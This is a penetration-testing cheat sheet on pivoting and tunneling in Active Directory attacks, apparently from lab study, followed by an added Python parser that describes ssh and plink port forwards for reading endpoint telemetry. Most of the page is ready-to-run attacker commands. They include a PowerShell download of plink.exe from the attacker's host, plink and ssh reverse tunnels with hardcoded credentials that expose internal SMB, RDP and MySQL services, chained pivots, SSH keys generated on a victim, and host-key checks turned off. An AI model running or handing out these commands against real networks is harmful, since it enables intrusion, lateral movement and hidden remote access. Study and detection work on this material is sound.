AD Attack Tunneling (with SSH key)
Burp > proxychains > app: Settings > Network > Connections > SOCKS Proxy
sudo netstat -tulpn # to check tunnel connections
plink ssh to kali from victim
#victim
netstat -ano # to see undiscovered services missed during nmap
#kali
python -m http.server 8080 # to host plink
service ssh start
#victim
powershell (New-Object System.Net.WebClient).DownloadFile('http://192.168.119.158:8080/plink.exe', 'C:/hfs/tmp/plink.exe')
cmd.exe /c echo y | plink.exe -ssh -l kali -pw kalipwd -R 192.168.119.158:7799:127.0.0.1:445 192.168.119.158
#kali
nmap -sT -sV -sC -p 7799 127.0.0.1
:445 = internal service ; :7799 = kali tunnel port to the target :445
#machine C
plink.exe -ssh -l b.user -pw b.pwd -N -R 10.1.1.9:1069:127.0.0.1:9050 10.1.1.9
#machine B 10.1.1.9
plink.exe -ssh -l kali -pw kalipwd -N -R 192.168.119.158:7799:127.0.0.1:1069 192.168.119.158
tunneling machine C :9050 to kali :7799 through machine B :1069
ssh to victim from kali
/etc/proxychains4.conf:
socks4 127.0.0.1 9050
socks4 127.0.0.1 9060
sudo ssh -N -D 127.0.0.1:9050 sean@10.11.1.251
sudo ssh -N -D 127.0.0.1:9060 j0hn@10.11.1.252 -p 22000 -o KexAlgorithms=+diffie-hellman-group1-sha1 -o HostKeyAlgorithms=+ssh-rsa
may add -i {cracked key} if a key from the victim's authorized_keys was cracked,
or -i {kali key} if kali's public key was placed in the victim's authorized_keys
pivot machine 8888 to windows victim 3389 (need victim pw)
ssh -L 8888:192.168.1.90:3389 root@192.168.1.90 # -f to background
(on pivot machine: rdp 127.0.0.1:8888)
kali connect to pivot machine 8888 to final victim 3389
rdp 192.168.2.90:8888
ssh from victim to kali
after finding which port is opened on the next client from 1st victim
# bind next client :22 to kali 1122, next client :3306 to kali 13306
ssh -f -N -R 1122:10.5.5.11:22 -R 13306:10.5.5.11:3306 -o "UserKnownHostsFile=/dev/null" -o "StrictHostKeyChecking=no" -i /tmp/keys/id_rsa kali@192.168.45.5
prevent ssh from asking for kali pwd with id_rsa
# in /tmp on 1st victim
mkdir keys
cd keys
ssh-keygen -f /tmp/keys/id_rsa # or enter /tmp/keys/id_rsa at the "file in which to save the key" prompt
cat id_rsa.pub
copy to kali ~/.ssh/authorized_keys
dynamic port forwarding
/etc/proxychains4.conf:
socks4 127.0.0.1 9050
ssh -f -N -R 9050 -o "UserKnownHostsFile=/dev/null" -o "StrictHostKeyChecking=no" -i /tmp/keys/id_rsa kali@192.168.119.173
windows allowing other access local :80
# 192.168.1.90:8080 = victim:80 (initiate from victim)
ssh -R 8080:internalwww:80 user@192.168.1.90
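Added example (not from the original page): a small Python parser that reads the -L/-R/-D specs on ssh and plink command lines like the ones above and states which side listens where and where the traffic exits, which helps when reading such commands back from endpoint command-line telemetry; the sample command lines are constructed to mirror the forms on this page. It also flags -R binds to non-loopback server addresses, which are only honoured when the ssh server's sshd has GatewayPorts enabled.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Constructed sample command lines in the forms this page uses (not captured from a real host).
SAMPLE_CMDS = [
    "plink.exe -ssh -l kali -pw kalipwd -N -R 192.168.119.158:7799:127.0.0.1:445 192.168.119.158",
    "ssh -f -N -R 1122:10.5.5.11:22 -R 13306:10.5.5.11:3306 -i /tmp/keys/id_rsa kali@192.168.45.5",
    "ssh -L 8888:192.168.1.90:3389 root@192.168.1.90",
    "sudo ssh -N -D 127.0.0.1:9050 sean@10.11.1.251",
    "ssh -f -N -R 9050 -i /tmp/keys/id_rsa kali@192.168.119.173",
]

LOOPBACK = {"", "127.0.0.1", "localhost", "::1"}
FLAG_RE = re.compile(r"(?:^|\s)-(R|L|D)\s+(\S+)")

@dataclass
class Forward:
    kind: str                  # "L" local, "R" remote, "D" dynamic (SOCKS)
    bind: str                  # listening address, "" when the command omits it
    port: int                  # listening port
    host: Optional[str]        # forward target, None for SOCKS-style forwards
    hostport: Optional[int]

    def describe(self) -> str:
        where = f"{self.bind or '<default bind>'}:{self.port}"
        if self.kind == "L":
            return f"ssh client listens on {where}, relays to {self.host}:{self.hostport} via the server"
        if self.kind == "D":
            return f"ssh client listens on {where} as a SOCKS proxy exiting via the server"
        if self.host is None:  # "-R port" alone: reverse dynamic SOCKS (OpenSSH 7.6+)
            return f"ssh server listens on {where} as a SOCKS proxy exiting via the client"
        return f"ssh server listens on {where}, relays to {self.host}:{self.hostport} via the client"

    def needs_gateway_ports(self) -> bool:
        # A -R listener on a non-loopback server address needs GatewayPorts in sshd; AllowTcpForwarding no blocks all
        return self.kind == "R" and self.bind not in LOOPBACK

def parse_spec(kind: str, spec: str) -> Forward:
    parts = spec.split(":")
    if len(parts) >= 3:                                 # [bind:]port:host:hostport
        bind = parts[0] if len(parts) == 4 else ""
        return Forward(kind, bind, int(parts[-3]), parts[-2], int(parts[-1]))
    bind = parts[0] if len(parts) == 2 else ""          # [bind:]port (SOCKS)
    return Forward(kind, bind, int(parts[-1]), None, None)

def parse_forwards(cmdline: str) -> List[Forward]:
    """Return every -L/-R/-D forward found on an ssh or plink command line."""
    return [parse_spec(k, s) for k, s in FLAG_RE.findall(cmdline)]
```

Call parse_forwards() on each entry of SAMPLE_CMDS and print describe() to see the direction of every tunnel on this page.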